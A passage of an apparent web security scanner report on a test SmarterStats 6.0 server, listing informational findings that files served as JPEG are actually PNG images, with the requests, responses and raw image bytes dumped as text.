...IHDR...".........L.......sRGB.........gAMA......a....    pHYs..........o.d..!.IDATx^.].......bcc...1`.ec..\.[.s.f...........c..7....a!.+$..]qH..V+.....0...?.....W35.3.=..S]....Q......*...#........A.`..V...... .(!"1.A@.(..!...@.....!"..A@.(..!...@.....!"..A@.(..!...@.....!"..A@.(..!...@...............F....Zf.....M.6.l}8.^......A...JAD.0........jp....;. -_S~....^...TA@. .JAD.-.%.    U....$_ .h.e...w..A@.(.....".C>:..t.bH..p.DMGW...&...W../.ellL}...R.....6..._...\D...".A*.n...s.Hw..".A.(...(........!...(...!.n....f....m.,I>.qBD.(......!.,D..U.H.c.[.D.FD..E..iL..t......Q.+..{.N...BD}l.{.~.5k....i......."]6.i.$.n.....MZM!:u.:...Y...g.........BD.`(..S........y;u..1+..>C.....q.-&X...<.....YMBD..L.(D..Qg..RM.|.BD..$D..Qg!"6..IBD..L.(D..Qg.D...>S..pBj.C@.f}`."b......:D.}.....u......!"!"...-..S...O"z...."r.8...@.WG.N...>..._.B-.m7..HD$...P..
..C..'.-=.4.x.}X.#D$D.2...Bt..u.ID........2.!"!"...-..S...o"z...X.#D$D.2...Bt..u.ID.1."r.92X..Df.!:u.:."..|...1{...X. ..DD,C.[(D..Qg_D..|.....Od.......P..
..C....}:9..h..3X.#D$D.2...Bt..u.ED....D.v.<....    ...%o...:D.}...O=..h...Y.#D$D.2...Bt..u.ED..Y..h...Y.#D$D.2...Bt..u.ED...Tw.........{.(.....C....!.....j.UW..@""..X...P.N.....h..+.....6\y%.t....X...P.N......    ..P............U...!.....?.H.......q..DD.....e......3..\.vS.sp....`..#2.G.8",".8.U..:.4.u..
.j..}.$...c0.....rj    ..C..WDt.N;...:Jm..rN..q..6.p..O...=.-!".9.
..C....a........5C$3\......h7...V.c....$c.....>.\I.N...>..$...... ...;U.......^M..I.....60..[zU.....6^{-..T.......h.'......t.X._......u......u.^...uEB.)3.....)...f.....#2.u2~...BI)D..Qg.D45:.#...^.6_=..J..M..S..)...X..<...T..g3..Y...d..eCN.Bt..u.AD&.~..k.f...\. "...2..z3R.r7..!".N..Bt..u.ADHxED.....o..e....M.....</!.<...;D..Qg.D......]wU[..Nm..oXF.(...m`!!..!dW..S....".......h...Y6 D..&!".9.
..C............4u....X.!D$D.2...Bt..u.AD.....5.}....LG.H..e(y....!............4k......#]..1....S...."ZD.....k".~.-,...H""...-..S....".....y?C..o...Y.#D$D.2...Bt..u............NP3......Y.#D$D.2...Bt..u...L......D..id.........!..7....5t...m....Ho|...H""...-..S..s.D......}8...+...........!..7......q.6........&!D........!..7....ABBD..C.....jBt..u....y...wT3.i>.......2F..$!".9.
..C.9o"ZFI..v.E.\v..BD..C.....*Bt..u....y.w....    .l.....2k68P.j...C.9o"B..}{....6.(.$.~p...hp..5...!..7.=L+..R...K..e.o.2.YG$...P..
..C.9o"B.....$D..a$"r.f..Bt..u........=.0....u.&;4..DBD.c..!D..Q......_9.H!"..s...8(..    ..C.9O"2    .+.>Zm.."].....;.....rk...C.9O".....3{...C'":&h.}p"@.>|..s.....vwq....'Xwbh2..i..-.k.....f.].Y3...S^.D.bj....F.GKG.m..\"".9.
..C.9....5..Yg.i:...._..e.%!".    u.%.......>..hh...0.o.{.#..X6.D(D..Q.<..d.o...P...r.....QR...R7.P_NQ...w.....>.......@l ...../j..;.i......_..P.$"J ".J.....h...l    'I^""...&.bt...yFD+h...v....>........._...D...%.....%7...:D..$"$......F..Y.......4...z#"
...f....k.n............:D..$.'.=W.G..s...Z..}..:..d........s##Xw...^.._M...*...7.*Y...rCf.^.9.|/.5...h.!:u.:...........Q7..7)=s..%......N.....C.Q..?.U>.5k..E.i.h.)n..?.q.$!"78rj    ..C.9......~..".(28.......3,.....v    ..C.9/"2    ...~..|.y.....q..........s&..F9e....K.N...y..Ix}.... ..........^.8..k...C....9.n.!.6.&....NR.h.....].j..#".3....._....!.......u..Z..u'...M...a.x.....yu...!.......I...t.9....kY..1"2[vD.R....wJ.<K......5@.N...y..NxE.k......hnE>I.&D$D...!.6::..;.Q..>..l.....e..Xu./$D..    Ct..u.+".    ....6.k.)[...eD........un....dB "....).._...ZH.nc...%{.....5v.O..a.h.,.g..,.....%.?_}U.z......$.u.k$.>...j..gv..|#".]..@D..h.S^...........@NH.C.T.K.._k..m.....D..5.....q.|..h..g....9F...N.....>..r........>....6\Hx}...{|e...X.f.#.......t}7b....5A.Ho.....{......8........X......X.(...DDg4.+/...h..e..P..Nq.k.2. X7.k%....=.2s..,|%".....6....;..0XW.K.._+...?.....UG.%D...i":.........(...8G..._.`...$..M....2s......(-"b...4V...+o...z.B..y..Y.`.....MP..3.Uh...^.....}Oa.Q..8......X...#.G..'3._.j.7...Q.    ..... ..a...(z].8.?;...X#....BD9...h..SXe=.8........9../X7.^v..zM]..l..2V..,".!..9jIg.E...s..D...(..+L...9../X7.....%..q....w..Q.i. ..v..,.9.5".t/..f.:":.dvy..Cu.........'.s..^.n`..&t...^.|e......$....zOp....^...z.!.,{.....%..O<Q....E].......X/..O.....\ "c<.....VC]....SS...D"...)..d..u..u.s.C^.n`.<..~..X?.r.%..)IDT."....'..bCB.}.....m[.^."I......a.q..........5...S.e.V..a........|.]#.\.`..3{.r...dNDD..5FO...G..s.i...c.M.....m... ..+......`..3...8?.r....)u...F7.p.R......^.....{..F,+.=...:*.../X..RH..%......yfk...9DD|#....._<.$.h..gl.j...D.....8.?...v..:..4.O...#...M....!...mI.....o...}_............$?..D...4..|..8........`_...m.).u#...q%..4.c\.1"F.y. D.F3    ........u##X+...........Tl-...;.s............`......vK..../d5.DD}`.....=....g.L..e.N...F....g...."r`j...=6s.k&.....s8hxf.....M<....>2=>.M..R".DDY....z!m..m.|]......j ...Y:.5.G....#".D&...........BD...Y.`....K....#..\.BS"...h@"z.9{..=...dP!q.A..._u..yf.P.....n.%uDD+F.-.w.U-...>.......<.U....""ZIc.I>2=o..a..."".D....E.ao....;G..F..:....i.^K    .BD9Z."..tz...4..F.as.<#..;G...Su..6.......>.Y"..M.%......"..vp.k_..;.......Xc.-.s........%5..y..2F.S.M.h.oM'..........]E.....Iyf.|d......1..1..G..\..i..'........ffX.....sp0r%Su...T.<.~.....Xp...@D..^.iO,x.Q..
uqU.9\`....X#.c    ..    .q-&....Q..gYC3jH.....nZ..#cSg...X.f.R.Y?..|..,l%"J..r&"4.2Z..1#l25.Uu...?....52....`!"... ...C...QF...b.c..#C3g...X#e    .......l:.......DD>H..X~...a.FGY.$Te.....7W.kL..^_...~>"D....o...m........s8hr.*...YU.&-G.....>...DDi..G"zl..........x.BU....^GI.BD..*.*..Q.....y.. ..U.9r6..........}..R}c.Yg......D.q..)....p.u..+.=.D..}].|..:.-.Ue...Y......4u?B.fi..9@Dtv......1....#...'<B..BO.e..;..).$.Ue...Y............1.76.y&...GDt..p].....1....q,...A ..$.4....,...1.Fd]i]e.`Y.C.*c.-b..1.4....tT.....R7..........Q.....]2S..v......5.<...."....f.m....i1c..O.~:......T.j...1^.h'z..N.|...R0>.X...w.q.*.Y..P..X....hr%.76.q.....Q...h....u...l...."!.........,kw,TU....;..(.76.NDz6.5M.......`.}3Q..)5..m.3X..E(..3..F......:.c.aUWU......9~.1....B..}..@8..[.....r..]V.9Q .,.....,.p,TU.q..........U..
.k.y..z.5v.y..2.....Zf...4..^..Z..:.5P.n.*.8....wg...&"...cV6:0..*4...\@....O.^Uu.[.\.W.k.u?J.L8~...SYP........&".N.(..:..b.YZ...ASg...X.d..4|........V...LE....=.mO...s.,=..*b...0l...9."......D...(k.    ...6V.9<.C.c.....W......Ol<.dV.HD....@B......1CasU.9l.q)[E.1P.0...D...R.BD.>._Tyh.].rzl.*:.>.e..5...-...{.}b...8.DD).QQ$......6..U.98F..L....6..*.............%]TY.......z.U5.....\...>YXQm..BD.,.h"B...q.&...spq.C....D^..&.......|0..d...d.Oy.BD.7.]...h[."..:f...q..F..?/....[........M..>LYR...Eo....h.....N:.e22F.6FT0.=MK.m.`....Rr.
Q.<u..f.>....?h.3........s,t..7.n.,z...7i.@.(gg..^GD.......{[%.f12...>.D....8=Hg.?b. ..DN...^Y..2.;.ht[_.:.D.....DD....Y&.$....P?...,%g....CgCB.S..m.g{/7..Y32..Ul.F....<J..l}aR.(S.u....=.C..^J..n.okd.......v..!..........=H....a.......D...J]D[_.dFn...ED.....i:-.;Ndkd.F..|.z.....`.oS.....{.....n.Q.7u...1.....x....e*..h...YOdkd.`rRE.z..y.-........p..i.*..O''...Fot.0h.(.......<.x.n...ED.......]Odcd,..$....t~.O.d.0u.l..v.H..m7Mi..YM....~.."r.@...Qc...G....3.#s...*B.{P..P.$.....66.\.a...F.'.=W..e.o.q..lD"...h...e(/6.-..12..x..To.....V....<......sfy.At6$....j_#.K..O.M..z.S.........c.eA+D....m.'J...kd,.H.B.6fRV.q.z....Go..l7p..:.. fl.....
....DF.    ......lH..........t>..9.Wo..a@...UO!"N.......fY.r/-p.#e[.........m....7.r..o,..CL..ZM-..2.>x>.IF....v....
...Q.{..!.R..^..zHm[....XY[......OIE$............>b......p.s.]......<`).;....9...DDi..Cc..Aq..f.l..7'j=.b.6.........3.^.F/.\.fR..m.7..%...".+........R.^+....g..X.bZ.t;}E.=w.9.M...u....}.....~=.`A@.R.~<..4z....>D.R....i...)../...ST.W_........ iD..I...0....'............ .....o.h.u.Z.P......Q.Y'...'.#"8[.
.....S.0....,.f.....G.....r".w`..8.$....GI_......Q.qv..g..U".{..9..'...V'.?t[A..{....A...6.o.p...    ....^h'....L..md.^.:A/...1.....w$UGs..-.{t4d..q.BDq..q.,N.m...@Ze$.q2 CF......A....N.]VQ.2.Q.......!.DU.....o..;...dW..Z.....i.m.61.....2.M.(.}^..........w.t......7...\.,D.C........t..- .    j.2.w..^%#z.....UU'..(..C...C.....?.....M.=@...]@..
...}..}4..].1........Q..x...\...Q..LQ...u.q."bDD*.........!.]...{...b..m.........,]3..%....x..w.:.6..w..f.c.zB....V.^.:8..Qg....!.\V..ED.
6.....(,...@..(.v....9.....n^y9A .....h'.R..............@."D.t...h.    .H5Jt.uo............~..F2.UL......x]i:..k.    ....b.k...7...o..<.E....0..tK..y.
...;b,f....n.>..D.....ERC.2..S.........~sMD.9q-
.....%.).R......4AW.....I....."...S.#..1,...W..Dd..p.hD..-...j...+.l.:.O....d.u.^.FD.z....V..k<..E.E...j.:...n....W..GD1..2.]."2o.........5Y....=...&j....S"....H...j.:.f...F.vW2.k.7""B.a........>5"*H..{...(..:VZ...EI%......t..I..H.;..9... ..-J....<...B....u.X.&).v.9@D...F.Dr.1...Vdl...%"..E.............7.(jx.#...C...e..D...J..o.....v.~Qi.o^..#y.?..z."....Q*    5.....i.h..0...............z.E..Muu.;...Z.E.8.9..q.............8V.7..=..o*U..Y.t.P..Y..R.k3..9.t..D.];:}........t.I.J.K%.....4#"j.......:..6..c.ic..w...y...Q...... P......
.. Pq...*n....@..."*C+...@...".......e@@.... :...G@.... ./....!.2... .T..!...... P......
.. Pq...*n....@..."*C+...@...".......e@...w..A=.......IEND.B`.

10.40. http://vulnerable.smarterstats.6.0.host:9999/Temp/a796b3465add49de8e0c091a308040ff.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/a796b3465add49de8e0c091a308040ff.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/a796b3465add49de8e0c091a308040ff.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; STHashCookie={"CountsGuid":"444009411","TopBarSection":"AdminManage"}; SelectedLanguage=; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Mon, 11 Oct 2010 20:16:24 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB69812D2FDC00"
Content-Type: image/jpeg
Content-Length: 7789
Connection: Close

.PNG
.
...IHDR...".........L.......sRGB.........gAMA......a....    pHYs..........o.d....IDATx^..[.lIQ.....TT.."".xE........E..V.W..[3../....m^.a.O..3.....Y....U.U..wDe...g..^+.:.gWDfd.."#3c?6.OX ,..X...-.?.....a.!@.. ,..X...... *......b......[ @.x.D...a..Q...@X`q.......@X ,. .1....,n....]......:......z....G7W.....l~.`S.n.E/....gn.N@t;\o.2..G7..._........j....(.._..:.Q...F. ......D....../.G..a.3.@. .V....dnu......>|8<......3../..b..A....x....Q./.d    vu3l"@. .[A`....1..o.m.1......[....90-q...Y..........k.``........../...........V...\..k......k...w.....5....V...p.[..l..9.|.=@..k..k....9o...UZ..?.h_M...Ztu........Q..N=.2.N.....K ....."r.. .WS....]....<.lK..Q.f}..    0~!..].D..m.......}....._.>D..D....g.Xm.. *.n.s-.P V}d...m.....g.%<.....m..l.y.s.N..Q.P7?..gi.Zt.GTj...Z:.@..G.k@.aKi...G..s!+..h_..a.k.. ......{..............%@.K.jl........$..NV..~.A.]..-<..c2<.j...@L... ....E..g...%@..Q.<.<...i....%...-..\.D....................!t...X.u.4;.Y-.o.R....K...DMVt.E......}0..]...w5...{..k..I..~........w.>*sV......."..%........V.4.rV.....Gb.. h.....F.PD..de.Y.}?.@....U.(7j*y.......K.?..zl...N{D.....@.<* u.@.......D.K.mR..w..H./ ..!..dRy......'..w...&......d...xR~....Tg.#:..<.K3....Ga.Y.}?. ...G....Lv.2.T_..~A4...!"g.n<.t.T...C.y...yT@...."t.@....vs.....~.~...O......{*..........$..\,}..X...>.......j.Z.l..O...1...yD....j..O%......O....y..d..4..1.....}.K.Y`@CH...V.k.....i..c("O.....vf){D?./......3.V3cZ.K5.......Y..'>...s.#.m.......@.uT`..R..%...    "b..f. .J...]..R..<....b.G...q.....%.,0.!$.,}..X..A..R}-..D..-x...
..
D....4.........1......-..D5.y........O&.:.".....A.\z....X)...+@Tj...Z:.@..G.....@....<"t.<.....h.3%.....mWf@w.+....."p.@...S;[._.-..#..Q........O&.:."......@..~<A.],.1..5c.1VJ...
..Z.....(...4...tT`)..S..<|5c.96[t..jzs..jt.E.i...........X....z..m.C...|...Q..'>...s.#...B.PD^/ zO......Q.2.;..q..m..H..wzK..K.I....<D....4CCH.Y b.R...C..R.-.:......y..9...+V.]...fL..O:..?.0.K/.lK. ....F....]..h:y...124......<"t.E.i...R..],0.!$..D.^.....rS.....)<....k..<*..f.....t.@.\z.x,./.R}-.:..r.p z....U...aZ..:.2U'/]"W....-..S.<A...G........Z..R.+.V~.l@.=!..L..3....X....].....y.G....L../.F.
bD....$..<    0.........#b..3......t.@.:.Z...Q....N...{.t.<.K.C.PD^/ ..."t    ..:X]L......e.1.....|...v..G.....@.:.Z5    b...\... bf..A...........v.2....O.b......-.4........n.fM.t.E.. r....:R..J B..Q,..Q....).]....u.M.......C.="4.D..w..g.d....Z.."@...'............w.D...w....t..1..5.%@Tc-.g. bf..A......<.D...h..<.D..g.t    ..X..Y...Y.d...../.6..]^..`...X b.=k.K...Z.."@...'.......A..#B...<..?.7......\z.L..Q....E...uO.9[.k."mc...G....3ADZzJ.<..........i..Y...    ....K...yDl..#..],....R...@"Sk_...MX
."r.wf.?.tL.....#z._'...y&.x8........"..9...    ...X..%...=A.],..<>.C....K?...W...40[.z."....k..{Dh...^@..tb....G..!u3<J=?.-};.Acy.F..[.S.. b...A...^..<D..x..........XKO....D.:P..^ F$.;.....0..A.....='2....7.\=.6,:.=J.......g...Y.Y...50.Q.D..@...-Y.....*.u..t&/.....;o(...D[.-.....J..[..A..."t.@.>.%.4...*..<.......cw.....]d.................#e...^9f.<.l}......|.>..W`\..[.....L.M......S...
$2.........s..#RR....!...1..>..E.i....x^.}_...X...(..U .y......wnJ..m.l.?...>.......A..[.z.".z..[........w<......g\...(..U.MJ....Q.%._ y>..l}.....@..Ge..-.@......*..<#...4.=..S.q...=3.....>..E.....M.B..D.........<C.5z;..!.....d......"O..W`|jHI....y&...I.3Y.'.E...(...%.....V..1S;. `.C/]D.."V`</..........k.)u.8./2..D J.. @..Q.'.[..k...
.g[~O...X z[...E...    |.. r...D.d^l}oN...h...._
D,.O..q.Ud.%.<..!............/2.Y.........X.Q.h..d...y....YmK... b.v......t.y.G.
./."..'..8./2..#..h.{F..SADi.....Fu.<l}L...Q....<"t.<"..'u.8./2..D....w...3...D...y......"O... ..."p.@......._E.Y...
W...y]d......=.........,0|W.... .....Bx.|...".$!@....=".>&.X..l..L B..D,.O..q.Ud.....@#..l}h.A.i...D.@....X........
.R?a.]...-...#b.....l}L...Q.... .........<#.h9..jF..u.1O..>.. .4.h. by|b_.....sK...#.w.r...*V>w..q.jd.V.}..u(....    "V<*......t.<".h.....D..zD....P@r..@..;.....r...w.D.5....K...yD.e.%.....r. ..c...n.'y....T-.........1..^@..T.t..DX........<o.....m..$.......K.......^.....l}^ .J.....l..?N .....>/.o...o..o.I.?.le.f.y.l....,...H..,..C*...d5..P^N...=...yD.e`...%..K..(....<D..zD....d.G.......u(O..>.. .z...S]......w.aH.<.y..3..a...%..#:.P;..?.."..Y..3........@.....}....H ...D,./@T.....x.~.+...g... b.C{."...}k.....".g.Q..#.C..g...:{..3O..2&f..=........m{C...X}........Df...Q...N........D..".2p.......p.@.......G~]...H<Y=..............D^/ ...!t..D..<........... b.....l}h.A.i b-..-.9..],..<>...1..-.....8..uZ6O..>.. .4....;.]'...."f.........i......N.j[.l}h.A.i b-.3..)A.]L...
X..c.ZF..Q...DjZTk..'..SA...k....oLuA...,.O..q..z.v.T...    D...y...1A.Z..@.G    D..K..#....<@Tj.'..N........D.......... ....X..:x...vXK.axDN b.R......1.<D,...@.....
..B.\.(@.f#.........D_.......%z.N.i...].^.. .....X....8[.z..<m....l.....K/...U.,5.p........^Y....a........3.. ....g7.@F9....H>$;.?.d5..Z..[..c.y.G.Z.f[~..||@..D..:+........f...#......#Z"1..lH.<l}.O..]4.....@.....cwU{..E.h...Kt.4["U,.40[..c.y...u....K..cwU{....H.`.]f. B'..:..%`g....T.w.e.f...~.....4}^...-=R..|.g.<......ga..7..N......SV.A....."O.......kS].....@{.>...........?....].F...9.YgCr\...=QE.....o..........c.._.9....... B.kD...|..=?......I.<65.......8.hd..c.COT..yD.e`.._......X..:xljh.5k..z.f5V8z.q...%.'.[..D,.k1....V..#..%....."'..k'D.....=...yD,.e.}..>?.....@+u..d.%....X @.^..&.z...K....b_.X....f..G.."..l..g.c...}e[..w..........^..K*@Tc.'..vB..a.{M.`.E..X......"t.@.....#...p.....9.....'.[.z...K.......4v.,b............y.....~n@.^.m...Z........G..    ...[.......G..^..W&....".h....    Y...R....@..    .....=QE.....Z..G,Q..P
!y.@.."V.2....    ".2I.Y...~...],}L.y,........x.(.!^.....X.....*u`A/C.+.........c    .]X.....9.....'.[.z..<mi........V..1)i...^.'x. .4.wy.R....G;[.o.....<3.I>.....f.2I.Y.|.o>7...].@. .A..g....I..$....u.R....U.i...z.......b_t. ..]3.\..u,.....-..8.i;=O./O.@.D.L...X.D.K.....:x,..{.5>.zcD...K$.g.X..X.U&..C......]zX
J.<B.V...F....Rl..q./:..(.B'.G.WE..$-.;[.z.............6..l.......9.<..#..-.4c.5...&..7.L........Et.a)(u.8.e...L.h.B.C...v..Al.J..f....3.{r..=QE..#.........;V....Kx.T|)...U-.n..[...    ._-...g.5....U.i bA/{D_........(.u...F..Qi.O=......Su..3h...U.. .{'.......b_.%.v...<...h.Z.....<y..^......X...|...................X.    D.o......*.4...'.,0|q.....".O.:'U:..#...y9...d..'...@......T.t.@.......^.Bg......X..Rq.D.y...W?6..\z.........Y......X.rK.5.(MTt.@.......n....1.....m4..j,..".r...5Ye..te.a.....>..G.....N....@...[*...."O..X.v ..."p..D._XZ|..B.\..    D.oq../H..]T... ....n........O........D5.p...[...`MV.<,].#Z.>.e...+....9.h..9O......t.<..%..],.....g.#.O.....-.K!.K3.R.....zP. "A/C...>t..|^....,.QxDN...[u..U&..
"...Z.I...e...3@td........5|./.....G..%.]"...yA..{.hl.......Z...Yk.....Q!n.........[.]4...G.Y..Z.yA...
..e.#..Y...O.O<.D..A....x...J..{...O,......8w....L]R.5.[s.........=0....g..a..g....k....E...D...g.%>....P,pv..X.f..b.P.......Y.hV...a..@w...u.%Q....Y @ty}.-..tg..Qw]..
.\...D.}~..........W7...G..Y..5.M.q..k...G.D.......$...a.....k......m;..x.TL..G.DEfJ.i09..... .iS6.y4.\./T.f}kn.t...W8.k....ZK.3...Wt=lWh.....n&..W.K.G.f}kn...Z.X).3....
.._%..H.. Z..5.m..]m.....c..N....D..*q.. *r..U_.R......c.t.T<. .0......ls.E.s-.k...
....5..,X}.}W1e.....j.....>...s/X.cG9x].p.....K.+u#.~:@..f.
....,. j2[|(,..@Z @..f.
....,. j2[|(,..@Z @.hM-9[.....P..M..O.;......v..O.o9.IOtw...'........n......._.O.&....N..z.i......K..V....Ik.1...o.......Z..............&..6.....i.w...N.o(....    =n&.i...u........[....UU_.<.o..'..N
...4.......w...^.&.f.....7;{&..f.K.z.    ..@.P.d...L....4.|..]p.]zmPp..M....f.....T.N.....f...=q^...    .h.nak. ...a.....Z-.....<r....<h71..|....8.
.....>}..F....d........j....e.....U.[....SZ..@}....-..
..s...t.......f-....<....f_.O....w.vw.6u..X!1.E.a.s{..U...MI...,j....YCC.w..........z.j....".){.T....1.m.C...V7...X..u@.,.;..)...1d... f.!a....X bD......@....u.5Q....X @t9}.-.tk..Q.]....\...D......@....u.5Q....X @t9}.-.tk..Q.]....\...D......@....u.5Q....X @t9}.-.tk..Q.]....\...."...a.......IEND.B`.

10.41. http://vulnerable.smarterstats.6.0.host:9999/Temp/aa9f9504e4da409ebc871fa02f1cfc5d.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/aa9f9504e4da409ebc871fa02f1cfc5d.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/aa9f9504e4da409ebc871fa02f1cfc5d.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:31:53 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682BAE755A80"
Content-Type: image/jpeg
Content-Length: 8473
Connection: Close

.PNG
.
...IHDR...".........L.......sRGB.........gAMA......a....    pHYs..........o.d.. .IDATx^.].......5.F..A1>0Qs#*o.<D...!...E8.S." ..7.../....|.C .9..8..BV....fy...w....P.w..L.L.......s.^..2gO............\@.......N..........B. ..@ u. D.w....@.B....@ u. D.w....@.B....@ u. D.w....@.B....@ u. D.w....@ .B.%
.&..T,.BW`.t.r.6...............|[.....5.D......hE.U.Q.<{..# ....R."/xD....+o...[.s.8....D [BD.N...<U.T%D.-/..j!...[kkk.8r..,G....~.-
0@.h......,......Y.....$F.^$.6^..MX.w...!.#B...d.f."...U#...P2.*...Q.........;...yH.B..    .z.f...$.;.%5....-_yt_|..>5#.q......G......!R.... ......*...Q=(.
..#{u.U..!RAK.mV    .i.|...f.a!r...J.....l!R.../..C......a!..s./A.b.....J.N..;.%5......H-htX..:PT.#..C. D.....Y%..i.......B..1..AfM@*V.U.!D.".P.c.UBpZ..9(..@. Dj....d...b5Y..B.!R.e=.Y%..u.......B..1..AfM@*V.U.!D.".P.c.UBpZ..9(..@. Dj....d...b5Y..B.!R.e=.Y%..u.......B..1..AfM@*V.U.!D.".P.c.UBpZ..9(..@. Dj....d...b5Y..B.!R.e=.Y%..u.......B..1..AfM@*V.U.!D.".P.c.UBpZ..9(..@. Dj....d...b5Y..B.!R.e=.Y%..u.......B..1..AfM@*V.U.!D.".P.c.UBpZ..9(..@. Dj....d...b5Y..B.!R.e=.Y%..u.......B..1..AfM@*V.U.!D.".P.c.UBpZ..9(    ...C,.7.e.!....E.....Q^}&q...F.`.wY.A. D.@.md......I.W..%.^p..~.....(..L....#D.v?!.....?..B.
..F."....3........w.....u.B./.B.n.7...J....
....BW..a..U....XY42.X:.o....|.E..7......2n\...>.p...
........    ..TNxt.XmWA......}......K:.@f.h..2.;MTO.}?...B.
P...(...hAr3!..0!r..+.J...PNTgA.o...>.C.B....F&    ..qdD,8....[>1{.. .}L!
...;....[~.:B$3....$J..#H......B..    #F."#0......._.B...&VCc
..nE.:B$.....|QP.."D....2!.P........8v....%..c.@|!.f)4....q. ....fUm    .|.L.C3V..jd..9.F..hTOv..B...3...EL!*....\y..."`N..G.B$...'....s@.Ii.~iB;....0G....F .V8.......w.....e..S..D.........f.w...=.............)B$.n......cK.s...3.$.....B!t]..uL#dDL.4.....T......,......^..!X!ly....S...$.&....mY.|.F....Zs..|ff.qc....w.s...LX.|.n.!..id. s$D.......=.....(..R..Bd.zS.H.e.=..9;F.I;..MgfD....Xu[c.!2.U .y.M.+i...=.$-D.-..C2w.....P.....m..I..)../.-.|..#D.Y.........zg.5cF...w.)B$.2...*.!j..p......W.(C.n8.v9}....>...cn*.s..-.....=..f.A,.>...D..Jh[.6E..b.......U....'....jJ......C.X.d.....N0A..Z...#....R.6..,vt.fuCl!......b......<. .y.Mes.>.-...../...S.......#[    m.....T.....g.r.........."V...!#2.U&..T..{}di......$D{:_fuCL!r6.2.c...Y.&b.!J.......17...>... v].-.\..jhL!r..vf5..D. D...X9..<.....w<...#D...K.....".z-o.`.....(1hC+..........&...;.!.y.......6.6.......y.M    ..g..~........Y..90A.X....B..Nve&p.5D..P. !..b.o."..+Pt.. .n....{8.....3.....!Z........(..@f....K.ww...OG...f.w.....g Dl.t.&M...V.....u.w,?6....<5...$.P..VR....    ...'i..w.V.3{..........F..y.%..r...d....n.4!.l.|.G..g......Mw..UVW48G...e,...A...-o.2......>.m..9B4...WXmP..'5.v.Z52."V.h5..i..]Y...>.a../.vN.e..D..2!.N...    .&.XI.n..&...07.;.3....#B.....%    ........Bd.s.BD.3{|....M.e.e#{......;...'...<.&.h.....]w.-..Q.y.B....
.+....
!R.../@...0V.I.N....{.#BSd....,?....+.    C.B....FI.B..U...pt...F<...bs.dY.]N.<.${.p.."..;....c........\........14....D.........t.$......O..M..d.{9..b+p.......7|0....D.....-......u42......$    .tk.{0...zJfDK~.$6}..,{.4...    .......V..u.D..a.`.D.f.U?...B....F .V8..%.....R.V..#.rD...3BT|.P`F.~j.fB..U.z.......f.k..I."i..{0..>.._.uDh.,{....;.......8S..Q=|!...;...^.......Vy2.[(.P..b ~...h.........b......02+D^.04ct.f.d...eV.$..?Y-.-.....ry.O..`./D..U....b.v,3[........}fM._..........Q.1~....f....MJ{.@R.....D#./..I..]g../.7A.Y............_.T.....u..f...."IB....>...0.3{j....=U../..#*eD.&.....Pp.... D.c.2..8..I.(.3....4...T....5>..<.+..!......QA......W.{0\..l..?...._.-.........>..|.9"....!#J.......1.;&...>......q..r..VC...w>..9....c!D.X.j..!.:.R.|....g6...b..q..r...%;Gd"...."SHW..2..<...}...cC..z.\Z..f5TKF$W:{..FF..^.......$..% "*I
w.}f+[G8"4.\Z..b5K..U..8T......4J*..t+....!
..._.-.w.9..X...[v.."....V.dD.<.f`+.m..B.......E.s..    _.u.yV.7......;.Y>.7.9":K......_.[.;.Q+..zW......sC[    m......\W.+.,.6-!.P%.6$D...\{....n1..~....G...k....]...V.!D........I..........213..wT..G..........%....s.........VB..7.(8....!.n...;    .Q..}G..Go...:.T..PQf....9.pg[    m............5...lF.:.}^....1.........Q.."[    m....`!.y.i..S....f.~.c....u....3Q.bF.-DnVt......R.....o.Qmt.......i    .9...X....%!Z.1:...>.9..j.d-+.....o.Qm...;..y..C./.`Q....u.....h..L.w..].Yy.o+.m..BTKg.5B..{..C./Lg..B..DB..."NY..`9iM+I.p.Jh[....F...c...5..fL....U.....c....[.,.&3.3[    m....Z!r.w.:.h..uNc.^7.....%t@#..:.(#z...v..v_9<...3[    m....Z...w\.......(.A...|..Q...G.k.(%M......!..xz{.....)D.k.....V%    ..s.*.....H......!..xz.<j].@.l...........{&.m...
...?..c..l%..~C.j#~.......!CB.6...2...5)..../.gt2]......o.Qm....I.......),z4.....y...W*+....-.Rl:. ...Jh[.....;. ?.....1&D......^U.....7..A..l%..~C......c....)D..?.z..s|)N.=...h..a.e./...._.v15-.....!..:.>q...~......Y.hph..}...,?R5.+DKZ...........V.!D.Pw..1....."..........k{....hh........;..VB..7....t..eD..x$.?.;'...`F...+:...6..OB....Xe..;dG..    .VB..7...+...e_
